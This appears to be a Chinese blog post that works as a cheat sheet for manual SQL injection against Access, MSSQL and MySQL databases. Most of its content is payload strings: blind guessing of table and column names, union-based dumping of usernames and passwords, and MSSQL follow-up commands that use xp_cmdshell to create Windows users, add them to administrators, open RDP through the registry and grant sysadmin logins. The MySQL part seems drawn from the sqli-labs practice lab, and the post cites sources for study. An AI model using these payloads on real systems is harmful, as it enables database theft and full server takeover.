Access+Mssql+Mysql手工注入基本流程

web-security

0x01 Access注入:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
判断表名:admin
and (select count(*) from admin)>0
判断字段名:username,password
admin_user admin_pwd
and (select count(admin_user) from admin)>0
猜解值的长度:admin_user=5 admin_pwd=16
and (select len(admin_user) from admin)=4依次尝试
猜属性值:
and (select left(admin_user,1) from admin)='a'
在’ ‘中依次尝试字母数字
and (select left(admin_user,2) from admin)='ad'
and (select left(admin_user,3) from admin)='adm'

偏移注入
猜表名: 
and exists (select * from 你要猜得表名)
查看是否存在表名 (存在的情况下页面刷新正常,同理猜字段一样的 结果存在admin

猜列名的字段名: 
and exists (select 你要猜的字段名 from 你已经才出来的表名)

查看是否存在字段名(结果存在username和password
order by n 直到返回不正常,那么返回的列数就是n-1。n用二分法取。

得出显位的数字
union select 1,2,3,4,5,...,n-1 from admin 

用显位猜解出字段内容
union select 1,2,username,4,5,...,n-1 from admin

0x02 Mssql/sqlserver注入:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
判断注入点:
and 1=1 and 1=2
猜版本:
and 1=@@version
猜用户名:
and 1=user
猜当前连接数据库:article
and 1=db_name()
猜解其它数据库:
and 1=(select name from master.dbo.sysdatabases where dbid=6)
猜第一个表名:’admin
因为列的当前数据库,所以 sysobjects=article.sys.sysobjects
and (select top 1 name from sysobjects where xtype='u')>0
猜其他表名:’t_jiaozhu’
and (select top 1 name from sysobjects where xtype='u' and name not in('admin'))>0
猜字段:username,password
and (Select Top 1 col_name(object_id('admin'),1) from sysobjects)>0
猜值
and (select username from admin)>0
破解密码MD5或者更改密码MD5值


后续操作
sqlserver 存储扩展应用
建立系统用户:
net user username pass /add
系统提权
net localgroup administrators username /add
打开3389
reg add "hklm\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d "0" /f
建立数据库用户:
;exec master..sp_addlogin user,pass;--
数据库提权:
;exec master..sp_addsrvrolemember aa,sysadmin;--
xp_cmdshell应用
建立系统用户
;exec master..xp_cmdshell "net user bb bb /add"--
防止xp_cmdshell:
;exec master..sp_dropextendedproc 'xp_cmdshell'
恢复xp_cmdshell
;exec master..sp_addextendedproc 'xp_cmdshell','xplog70.dll'
彻底防溢出
c:\windows\system32\cmd.exe 删除所有默认权限.
添加administrator–完全控制

0x03 Mysql注入:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
猜解字段数
order by 3%23 
union select 1,2,3%23
获取当前数据库名
union select 1,(select database()) ,3%23
security
获取所有数据库名
union select 1,2,(select group_concat(schema_name) from information_schema.schemata)%23
information_schema,challenges,mysql,performance_schema,security
获取表名
union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema = 0x7365637572697479)%23
emails,referers,uagents,users
获取列名
union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema = 0x7365637572697479 and table_name=0x7573657273)%23
id,username,password
获取数据
union select 1,2,(select group_concat(id,0x7c,username,0x7c,password) from security.users)%23
获取数据库版本
union select 1,@@version,database()%23

0x04 参考:

1 ACCESS+MSSQL手工注入笔记
2 sqli-labs详细通关指南